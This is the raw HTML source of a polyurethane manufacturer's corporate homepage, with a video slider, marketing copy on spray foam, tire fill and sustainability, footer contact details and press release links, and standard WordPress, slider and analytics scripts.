data-source="gallery" style="background-color:transparent;padding:0px;"> <!-- START REVOLUTION SLIDER 5.3.1 fullscreen mode --> <div id="rev_slider_2_1" class="rev_slider fullscreenbanner" style="display:none;" data-version="5.3.1"> <ul> <!-- SLIDE --> <li data-index="rs-2" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="-60" data-rotate="0" data-saveperformance="off" data-ssop="true" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="/wp-content/uploads/2017/02/videoIm.png" alt="" title="videoIm" width="1920" height="1080" data-bgposition="center center" data-bgfit="cover" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- BACKGROUND VIDEO LAYER --> <div class="rs-background-video-layer" data-volume="mute" data-videowidth="100%" data-videoheight="100%" data-videomp4="https://bb20f7d9fabe53a3c00a-54030f02a24237b675ddbf946e66d4c0.ssl.cf1.rackcdn.com/homeVideo.mp4" data-videopreload="auto" data-videostartat="00:01" data-videoendat="01:01" data-videoloop="loopandnoslidestop" data-forceCover="1" data-aspectratio="16:9" data-autoplay="true" data-autoplayonlyfirsttime="false" ></div> <!-- LAYER NR. 1 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-2-layer-12" data-x="center" data-hoffset="" data-y="center" data-voffset="" data-width="['2400']" data-height="['2400']" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":10,"speed":20,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":1060,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0, 0, 0, 0.50);border-color:rgba(0, 0, 0, 0.50);"> </div> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme" id="slide-2-layer-1" data-x="center" data-hoffset="" data-y="center" data-voffset="" data-width="['auto']" data-height="['auto']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":20,"frame":"0","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":1030,"frame":"999","to":"opacity:0;","ease":"nothing"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: rgba(255, 255, 255, 1.00);font-family:Open Sans;"><h1 class="slider-header">Accella Polyurethane Systems™ shapes the ideas that<br /><span class='bluePar bold'>enhance our lives</span> through improved comfort, safety,<br />sustainability, and performance.</h1> </div> <!-- LAYER NR. 3 --> <div class="tp-caption tp-resizeme" id="slide-2-layer-5" data-x="center" data-hoffset="-225" data-y="bottom" data-voffset="20" data-width="['450']" data-height="['150']" data-visibility="['on','on','off','off']" data-type="text" data-responsive_offset="off" data-frames='[{"delay":10,"speed":20,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":630,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; min-width: 450px; max-width: 450px; max-width: 150px; max-width: 150px; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: rgba(255, 255, 255, 1.00);font-family:Open Sans;"><center><a href="/learn-more"><button class="blueSlider">WHO WE ARE</button></a></center> </div> <!-- LAYER NR. 4 --> <div class="tp-caption tp-resizeme" id="slide-2-layer-6" data-x="center" data-hoffset="225" data-y="bottom" data-voffset="20" data-width="['450']" data-height="['150']" data-visibility="['on','on','off','off']" data-type="text" data-responsive_offset="off" data-frames='[{"delay":10,"speed":20,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":700,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; min-width: 450px; max-width: 450px; max-width: 150px; max-width: 150px; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: rgba(255, 255, 255, 1.00);font-family:Open Sans;"><center><a href="/science"><button class="blueSlider">TECHNOLOGY WE DELIVER</button></a></center> </div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> /****************************************** - PREPARE PLACEHOLDER FOR SLIDER - ******************************************/ var setREVStartSize=function(){ try{var e=new Object,i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; e.c = jQuery('#rev_slider_2_1'); e.gridwidth = [1240]; e.gridheight = [868]; e.sliderLayout = "fullscreen"; e.fullScreenAutoWidth='off'; e.fullScreenAlignForce='off'; e.fullScreenOffsetContainer= ''; e.fullScreenOffset=''; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} }; setREVStartSize(); var tpj=jQuery; var revapi2; tpj(document).ready(function() { if(tpj("#rev_slider_2_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_2_1"); }else{ revapi2 = tpj("#rev_slider_2_1").show().revolution({ sliderType:"hero", jsFileLocation:"//accellacorp.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullscreen", dottedOverlay:"none", delay:9000, navigation: { }, visibilityLevels:[1240,1024,778,480], gridwidth:1240, gridheight:868, lazyType:"none", shadow:0, spinner:"spinner0", autoHeight:"off", fullScreenAutoWidth:"off", fullScreenAlignForce:"off", fullScreenOffsetContainer: "", fullScreenOffset: "", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", disableFocusListener:false, } }); } }); /*ready*/ </script> </div><!-- END REVOLUTION SLIDER --></div> </div> </div></div><div id="globeRow" class="grve-section grve-flex-row grve-middle-content" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1 vc_custom_1545152273954"> <h2 class="grve-element grve-align-center grve-title-no-line blueTitle bold" style=""><span>Speed + Scale = Solutions</span></h2><div class="grve-element grve-text"> <p style="text-align: center; font-size: 20px; line-height: 28px; color: #000;">As the leading independent polyurethane systems house in North America, our company is dedicated to delivering eco-friendly polyurethane technology and solutions to our customer network with the speed, scale, and efficiency necessary to meet the demands of a rapidly growing marketplace.</p> </div> <div class="grve-row"> <div class="wpb_column grve-column grve-column-1-4"> </div> <div class="wpb_column grve-column grve-column-1-6"> <div class="grve-element grve-image my-image-class1 grve-align-center" style=""><a href="https://accellacorp.com/spray-foam/" target="_self"><img width="388" height="313" src="/wp-content/uploads/spray_foam_03-1.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/spray_foam_03-1.png 388w, /wp-content/uploads/spray_foam_03-1-300x242.png 300w" sizes="(max-width: 388px) 100vw, 388px" /></a></div> </div> <div class="wpb_column grve-column grve-column-1-6"> <div class="grve-element grve-image my-image-class3 grve-align-center" style=""><a href="https://accellacorp.com/tirefill/" target="_self"><img width="388" height="313" src="/wp-content/uploads/tire_fill_07-1.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/tire_fill_07-1.png 388w, /wp-content/uploads/tire_fill_07-1-300x242.png 300w" sizes="(max-width: 388px) 100vw, 388px" /></a></div> </div> <div class="wpb_column grve-column grve-column-1-6"> <div class="grve-element grve-image my-image-class4 grve-align-center" style=""><a href="https://accellacorp.com/specialty-products/" target="_self"><img width="388" height="313" src="/wp-content/uploads/specialty_09.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/specialty_09.png 388w, /wp-content/uploads/specialty_09-300x242.png 300w" sizes="(max-width: 388px) 100vw, 388px" /></a></div> </div> <div class="wpb_column grve-column grve-column-1-4"> </div> </div> </div> </div></div><div class="grve-section grve-flex-row fullWidth" style="margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1485801454603 grve-tablet-column-1 grve-tablet-sm-column-1 backgroundImageOnly"> </div> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1485866188489 grve-tablet-column-1 grve-tablet-sm-column-1"> <h2 class="grve-element grve-align-left grve-title-no-line bluePar bold" style="margin-bottom: 25px;"><span>Polyurethane Systems</span></h2><h5 class="grve-element grve-align-left grve-title-no-line whiteSub" style="margin-bottom: 15px;"><span>INNOVATIVE, VERSATILE, HIGH-PERFORMANCE POLYMER PRODUCTS</span></h5><div class="grve-element grve-text"> <p><span class="tWhite" style="font-size: 18px;">Our polyurethane technology and solutions span a wide variety of industrial, commercial, and consumer product applications. Our innovative high-performance polyurethane systems include binders, flexible and rigid foams, elastomers, casting resins, surface and specialty coatings, adhesives, and recycled rubber products. Accella<sup>TM</sup> also markets spray polyurethane foam insulation, roofing and protective coatings, and industry-leading polyurethane liquid tire fill. When polyurethanes are involved, Accella<sup>TM</sup> has significant technical application experience, scale, and solutions for most every application.</span></p> </div> <div class="wpb_raw_code wpb_content_element wpb_raw_html alignLeft"> <div class="wpb_wrapper"> <a href="/polyurethanes-overview"><button>Learn More</button></a> </div> </div> </div> </div></div><div class="grve-section grve-flex-row fullWidth" style="margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1485866230825 grve-tablet-column-1 grve-tablet-sm-column-1 alignRight"> <h2 class="grve-element grve-align-right grve-title-no-line bluePar bold" style="margin-bottom: 25px;"><span>Innovation</span></h2><h5 class="grve-element grve-align-right grve-title-no-line whiteSub" style="margin-bottom: 15px;"><span>DELIVERED THROUGH TECHNOLOGY AND EXPERIENCE</span></h5><div class="grve-element grve-text"> <p><span class="tWhite" style="font-size: 18px;">Formed over the past half decade through the strategic acquisition of multiple industry-leading R&amp;D and production entities – including Dash Multi-Corp, MarChem, Arnco, Pathway Polymers, RTH/Ultimate Systems, RB Rubber, IPS Polymer Systems, Zeus Tyre Fill, Premium Spray Products, Burtin Polymer Labs Quadrant Spray Foam, and Covestro’s Spray Foam business – Accella Polyurethane Systems’<sup>TM</sup> core offering lies in our polyurethane business foundation. Our company is built upon a dedicated polyurethane technology heritage with 25+ high caliber degreed chemists and PhDs on our technology development team.</span></p> </div> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <a href="/science"><button>Learn More</button></a> </div> </div> </div> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1485801701884 grve-tablet-column-1 grve-tablet-sm-column-1 backgroundImageOnly"> </div> </div></div><div class="grve-section grve-flex-row fullWidth" style="margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1497638023794 grve-tablet-column-1 grve-tablet-sm-column-1 backgroundImageOnly"> </div> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1485866244030 grve-tablet-column-1 grve-tablet-sm-column-1"> <h2 class="grve-element grve-align-left grve-title-no-line bluePar bold" style="margin-bottom: 25px;"><span>Sustainability and Green Solutions</span></h2><h5 class="grve-element grve-align-left grve-title-no-line whiteSub" style="margin-bottom: 15px;"><span>OUR COMMITMENT TO THE ENVIRONMENT TOUCHES EVERYTHING WE DO</span></h5><div class="grve-element grve-text"> <p><span class="tWhite" style="font-size: 18px;">Accella<sup>TM</sup>&#8216;s commitment to developing and delivering eco-friendly business solutions is at the heart of our corporate mission &#8211; guiding our R&amp;D, raw materials procurement and handling, in-house manufacturing, and product applications.</span></p> </div> <div class="wpb_raw_code wpb_content_element wpb_raw_html alignLeft"> <div class="wpb_wrapper"> <a href="/sustainability/"><button>Learn More</button></a> </div> </div> </div> </div></div><div class="grve-section" style="background-color:#2a2b2f;padding-top: 50px;padding-bottom: 30px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="grve-element grve-text"> <h1 style="text-align: center; font-weight: normal !important;"><a href="/contact"><span style="color: #fff !important; font-family: 'Raleway', sans-serif !important;">CONNECT </span><span style="color: #2e95d2 !important; font-family: 'Raleway-bold', sans-serif !important; font-weight: bold;">WITH AN </span><span style="color: #fff !important; font-family: 'Raleway', sans-serif !important;">ACCELLA<sup>TM</sup></span><span style="color: #2e95d2 !important; font-family: 'Raleway-bold', sans-serif !important; font-weight: bold;"> TEAM MEMBER</span></a></h1> </div> </div> </div></div><div class="grve-section grve-flex-row fullWidth no-padding" style="padding-top: 150px;padding-bottom: 150px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="grve-row fullWidth"> <div class="wpb_column grve-column grve-column-1-6 alignTop"> </div> <div class="wpb_column grve-column grve-column-2-3"> <div class="grve-element grve-text"> <h3 style="text-align: center; font-weight: normal !important;"><span style="color: #000000;">We are proudly committed to developing the custom formulated products and solutions to drive measurable value – and unparalleled marketplace advantage – to improve our customers&#8217; performance and profitability.</span></h3> </div> <div class="grve-element grve-text"> </div> </div> <div class="wpb_column grve-column grve-column-1-6 vc_custom_1484881922761 alignBot"> </div> </div> </div> </div> <div class="grve-bg-image" style="background-image: url(/wp-content/uploads/2017/01/hexdesign.png);"></div></div><div class="grve-section no-padding" style="padding-top: 200px;padding-bottom: 200px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="parallax" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="grve-element grve-text"> <h1 class="white" style="text-align: center;"><span class="bluePar bold">Environment</span> really matters at Accella<sup>TM</sup></h1> <h5 class="white" style="text-align: center;">Accella Polyurethane Systems<sup>TM</sup> is fully committed to sustainability and green solutions as a fundamental operating principle. Our spray foam improves energy efficiency up to 50% versus traditional insulation, reducing energy usage and the associated greenhouse gases from energy production. Our tire fill products use over 100 million pounds of recycled rubber, keeping tires and rubber scrap out of landfills or from being burnt.</h5> </div> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <center><a href="/sustainability"><button>Learn More</button></a></center> </div> </div> </div> </div> <div class="grve-dark-overlay grve-overlay-50"></div> <div class="grve-bg-image" data-stellar-ratio="0.5" style="background-image: url(/wp-content/uploads/2017/01/Sustainability-Bar-1920x1285.jpg);"></div></div><div class="grve-section grve-middle-content" style="background-color:#2e95d2;padding-top: 50px;padding-bottom: 50px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1-3"> <div class="grve-element grve-image circleImg grve-align-center" style="margin-bottom: 0px;"><img width="500" height="500" src="/wp-content/uploads/2017/01/AmericanForests_circle.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/01/AmericanForests_circle.png 500w, /wp-content/uploads/2017/01/AmericanForests_circle-150x150.png 150w, /wp-content/uploads/2017/01/AmericanForests_circle-300x300.png 300w, /wp-content/uploads/2017/01/AmericanForests_circle-80x80.png 80w" sizes="(max-width: 500px) 100vw, 500px" /></div> </div> <div class="wpb_column grve-column grve-column-1-3"> <div class="grve-element grve-image circleImg grve-align-center" style="margin-bottom: 0px;"><img width="500" height="500" src="/wp-content/uploads/2017/01/onetotleCircle.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/01/onetotleCircle.png 500w, /wp-content/uploads/2017/01/onetotleCircle-150x150.png 150w, /wp-content/uploads/2017/01/onetotleCircle-300x300.png 300w, /wp-content/uploads/2017/01/onetotleCircle-80x80.png 80w" sizes="(max-width: 500px) 100vw, 500px" /></div> </div> <div class="wpb_column grve-column grve-column-1-3"> <div class="grve-element grve-image circleImg grve-align-center" style="margin-bottom: 0px;"><img width="500" height="500" src="/wp-content/uploads/2016/12/nrpa.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2016/12/nrpa.png 500w, /wp-content/uploads/2016/12/nrpa-150x150.png 150w, /wp-content/uploads/2016/12/nrpa-300x300.png 300w, /wp-content/uploads/2016/12/nrpa-80x80.png 80w" sizes="(max-width: 500px) 100vw, 500px" /></div> </div> </div></div><div class="grve-section" style="background-color:#2a2b2f;padding-top: 50px;padding-bottom: 30px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="grve-element grve-text"> <h1 style="text-align: center; font-weight: normal !important;"><a href="/learn-more"><span style="color: #fff !important;">READ MORE ABOUT</span> <span style="color: #2e95d2 !important; font-weight: bold;">ACCELLA<sup>TM</sup></span></a></h1> </div> </div> </div></div><div id="segmentRow" class="grve-section grve-feature-footer grve-middle-content fullWidth" style="padding-top: 150px;padding-bottom: 150px;margin-bottom: 0px;" data-section-title="" data-section-type="fullwidth-background" data-image-type="none" data-full-height="no"> <div class="grve-row grve-bookmark"> <div class="wpb_column grve-column grve-column-1"> <div class="grve-row vc_custom_1487794326246"> <div class="wpb_column grve-column grve-column-1-4 vc_custom_1487809162166 grve-tablet-column-1-2 grve-tablet-sm-column-1-2"> <div class="grve-element grve-image polyButton2 grve-full-image grve-align-center" style="margin-bottom: 0px;"><a href="/success-stories/" target="_self"><img width="395" height="211" src="/wp-content/uploads/button_polyurethanes2.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/button_polyurethanes2.png 395w, /wp-content/uploads/button_polyurethanes2-300x160.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></a></div><div class="grve-element grve-image scienceButton grve-full-image grve-align-center" style="margin-bottom: 0px;"><a href="/science" target="_self"><img width="395" height="430" src="/wp-content/uploads/2017/02/button_science2.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/02/button_science2.png 395w, /wp-content/uploads/2017/02/button_science2-276x300.png 276w" sizes="(max-width: 395px) 100vw, 395px" /></a></div> </div> <div class="wpb_column grve-column grve-column-1-4 vc_custom_1487809155134 grve-tablet-column-1-2 grve-tablet-sm-column-1-2"> <div class="grve-element grve-image newsButton grve-full-image grve-align-center" style="margin-bottom: 0px;"><a href="/news" target="_self"><img width="395" height="430" src="/wp-content/uploads/2017/02/button_news2.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/02/button_news2.png 395w, /wp-content/uploads/2017/02/button_news2-276x300.png 276w" sizes="(max-width: 395px) 100vw, 395px" /></a></div><div class="grve-element grve-image leadershipButton grve-full-image grve-align-center" style="margin-bottom: 0px;"><img width="395" height="211" src="/wp-content/uploads/2017/02/button_leadershipteam2.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/02/button_leadershipteam2.png 395w, /wp-content/uploads/2017/02/button_leadershipteam2-300x160.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></div> </div> <div class="wpb_column grve-column grve-column-1-2 vc_custom_1487809167973 grve-tablet-column-1 grve-tablet-sm-column-1"> <div class="wpb_raw_code wpb_content_element wpb_raw_html vc_custom_1487813560059"> <div class="wpb_wrapper"> <div class="grve-column-1-2 sustainabilityButton" style="margin-bottom: 0px; padding: 0px;"><a href="/sustainability" target="_self"><img width="100%" height="auto" src="/wp-content/uploads/2017/02/button_sustainability2.png" class="attachment-full size-full" alt="" style="opacity: 1;"></a></div> <div class="grve-column-1-2 companyButton" style="margin-bottom: 0px; padding: 0px;"><a href="/about" target="_self"><img width="100%" height="auto" src="/wp-content/uploads/2017/02/button_ourcompany2.png" class="attachment-full size-full" alt="" style="opacity: 1;"></a></div> </div> </div> <div class="grve-element grve-image rbButton grve-full-image grve-align-center" style=""><a href="/polyurethanes-overview" target="_self"><img width="790" height="430" src="/wp-content/uploads/2017/02/button_RecycledRubber2.png" class="attachment-full size-full" alt="" srcset="/wp-content/uploads/2017/02/button_RecycledRubber2.png 790w, /wp-content/uploads/2017/02/button_RecycledRubber2-300x163.png 300w, /wp-content/uploads/2017/02/button_RecycledRubber2-768x418.png 768w" sizes="(max-width: 790px) 100vw, 790px" /></a></div> </div> </div> </div> </div></div> </div> <!-- End Content --> </div> </div> </div> <footer id="grve-footer" data-sticky-footer="no"> <div class="grve-container"> <div id="grve-footer-area" class="grve-section" data-section-type="fullwidth-background"> <div class="grve-row"> <div class="grve-column-1-4 grve-tablet-column-1-2"><div id="text-2" class="grve-widget widget widget_text"><h5 class="grve-widget-title">ABOUT</h5> <div class="textwidget"><p style="font-size: 11px; line-height: 14px;">Accella Polyurethane Systems™, Inc. headquartered in St. Louis, MO, shapes the ideas that enhance our lives through improved comfort, safety, sustainability, and performance. As the leading independent polyurethane systems house in North America, the company is dedicated to delivering eco-friendly polyurethane and recycled rubber product solutions to its customers with the speed, scale and efficiency necessary to meet the demands of a rapidly growing marketplace. Accella presently has nine production facilities across the United States, as well as one in Europe and one in China.<br /> <a href="/about" style="font-size: 12px;">Read More <i class="fa fa-angle-double-right" aria-hidden="true"></i></a></p></div> </div><div id="text-5" class="grve-widget widget widget_text"><h5 class="grve-widget-title">SOCIAL</h5> <div class="textwidget"><a href="https://www.facebook.com/AccellaPerformance-1540600219343314/" class="socialIcons"><i class="fa fa-facebook" aria-hidden="true"></i></a> <a href="https://twitter.com/AccellaCorp" class="socialIcons"><i class="fa fa-twitter" aria-hidden="true"></i></a><a href="https://www.linkedin.com/company/accella-performance-materials" class="socialIcons"><i class="fa fa-linkedin" aria-hidden="true"></i></a></div> </div></div><div class="grve-column-1-4 grve-tablet-column-1-2"><div id="rpjc_widget_cat_recent_posts-2" class="grve-widget widget rpjc_widget_cat_recent_posts widget_recent_entries"><h5 class="grve-widget-title">PRESS RELEASES</h5><ul><li><a href="/accella-tire-fill-systems-manufacturer-of-the-sustainable-tyrfil-flatproofing-teams-with-american-forests-to-help-replant-californias-devastated-el-dorado-wildfire-area/">Accella Tire Fill Systems, Manufacturer of the Sustainable TyrFil&#x2122; Flatproofing, Teams with American Forests to Help Replant California’s Devastated El Dorado Wildfire Area</a><span class="post-date">August 28, 2018</span></li><li><a href="/carlisle-companies-incorporated-completes-purchase-accella-performance-materials/">Carlisle Companies Incorporated Completes Purchase of Accella Performance Materials</a><span class="post-date">November 1, 2017</span></li><li><a href="/carlisle-companies-acquire-accella-performance-materials/">Carlisle Companies to Acquire Accella Performance Materials</a><span class="post-date">October 2, 2017</span></li></ul></div></div><div class="grve-column-1-4 grve-tablet-column-1-2"><div id="text-3" class="grve-widget widget widget_text"><h5 class="grve-widget-title">INDUSTRIES &#038; MARKETS</h5> <div class="textwidget"><ul class="footerIndustries"> <li><a href="/polyurethanes-overview">Construction</a></li> <li><a href="/polyurethanes-overview">Landscaping</a></li> <li><a href="/ultimate-rb">Flooring</a></li> <li><a href="/polyurethanes-overview">Transportation</a></li> <li><a href="/polyurethanes-overview">Filtration</a></li> <li><a href="/polyurethanes-overview">Industrial Equipment</a></li> <li><a href="/polyurethanes-overview">Energy</a></li> <li><a href="/polyurethanes-overview">Electronics</a></li> </ul></div> </div></div><div class="grve-column-1-4 grve-tablet-column-1-2"><div id="text-4" class="grve-widget widget widget_text"><h5 class="grve-widget-title">LEGAL</h5> <div class="textwidget"><a target="_blank" href="/wp-content/uploads/Accella-Disclosure-California-Transparency-in-Supply-Chains-Act.pdf" rel="noopener noreferrer">CA Transparency Act Disclosure</a><br /> <a target="_blank" href="/wp-content/uploads/Terms_and_Conditions_of_Sale_-_Accella_FINAL_062716.pdf" rel="noopener noreferrer">Terms and Conditions of Sale</a></div> </div><div id="text-6" class="grve-widget widget widget_text"><h5 class="grve-widget-title">CONTACT</h5> <div class="textwidget"><p><i class="fa fa-map-marker" aria-hidden="true"></i>&emsp;2500 Adie Rd<br />Maryland Heights, MO 63043</p> <p><i class="fa fa-mobile" aria-hidden="true"></i>&emsp;(314) 432-3200</p> <p><i class="fa fa-paper-plane" aria-hidden="true"></i>&emsp;<a href="mailto:[email protected]?Subject=Support" target="_top" rel="noopener noreferrer">[email protected]</a></p></div> </div></div> </div> </div> <div id="grve-footer-bar" class="grve-section" data-section-type="fullwidth-background" data-align-center="yes"> <div class="grve-row"> <div class="grve-column-1-2"> <div class="grve-copyright"> <p style="text-align: left;">Copyright 2019 | Accella Corporation</p> </div> </div> </div> </div> </div> </footer> </div> <!-- end #grve-theme-wrapper --> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/accellacorp.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='/wp-content/plugins/go_pricing/assets/js/go_pricing_scripts.js?ver=3.3.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var grve_plugins_data = {"retina_support":"default"}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/plugins.js?ver=3.3.0'></script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/smartresize.js?ver=1.0.0'></script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/isotope.pkgd.min.js?ver=2.0.0'></script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/packery-mode.pkgd.min.js?ver=0.1.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var grve_main_data = {"siteurl":"https:\/\/accellacorp.com\/wp-content\/themes\/osmosis","ajaxurl":"https:\/\/accellacorp.com\/wp-admin\/admin-ajax.php","grve_wp_gallery_popup":"0","grve_row_stellar_auto":"1","grve_string_weeks":"Weeks","grve_string_days":"Days","grve_string_hours":"Hours","grve_string_minutes":"Min","grve_string_seconds":"Sec"}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/themes/osmosis/js/main.js?ver=3.3.0'></script> <script type='text/javascript' src='/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.0'></script> <script type='text/javascript'>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-19711384-20', 'auto'); ga('send', 'pageview');</script> </body> </html> <script type="text/javascript">$( window ).load(function() {$("#grve-post-title-content").html("<h4 class='grve-title grve-light' style='opacity: 1;'><span>Press </span><span class='bluePar bold'>Releases</span></h4>");});</script> <script type="text/javascript"> $( window ).load(function() { $("#grve-header").attr("data-overlap","yes"); }); </script> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Page Caching using disk: enhanced (SSL caching disabled) Served from: accellacorp.com @ 2019-05-16 15:44:28 by W3 Total Cache -->
0
